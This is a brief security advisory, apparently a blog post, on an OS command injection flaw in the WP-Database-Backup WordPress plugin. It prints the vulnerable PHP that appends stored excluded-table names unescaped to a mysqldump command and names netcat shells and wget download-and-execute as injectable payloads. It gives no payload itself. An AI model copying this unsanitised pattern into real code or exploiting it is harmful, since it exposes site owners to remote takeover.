OS Command Injection in WP-Database-Backup

This vulnerability affects the wordpress-database Backup plugin and allows malicious crafted payload to be stored in wordpress “wp_db_exclude_table” to be executed on the remote host

Vulnerable code:

	$wp_db_exclude_table = array();
	$wp_db_exclude_table = get_option('wp_db_exclude_table');
	if (!empty($wp_db_exclude_table)) {
	    foreach ($wp_db_exclude_table as $wp_db_exclude_table) {
	        $cmd .= ' --ignore-table=' . DB_NAME . '.' . $wp_db_exclude_table;
	        // error_log(DB_NAME.'.'.$wp_db_exclude_table);
	    }
	}

The code executes the program mysqldump with the argument “–ignore-table=” and appends each entry in the wp_db_exclude_table list. This leads to a enabling a malicious third party where to inject a payload in to the list such as a netcat shell or a malicious download and execute wget request

Recommendation:
If you run wordpress with this plugin we suggest you update your wordpress platform asap

External Links:
Sucuri
Firo
WPVULN
Wordfence Patch

Author:
ethicalhack3r
WPSCAN.IO

OS Command Injection in WP-Database-Backup

OS Command Injection in WP-Database-Backup

Vulnerable code:

Firo Solutions Blog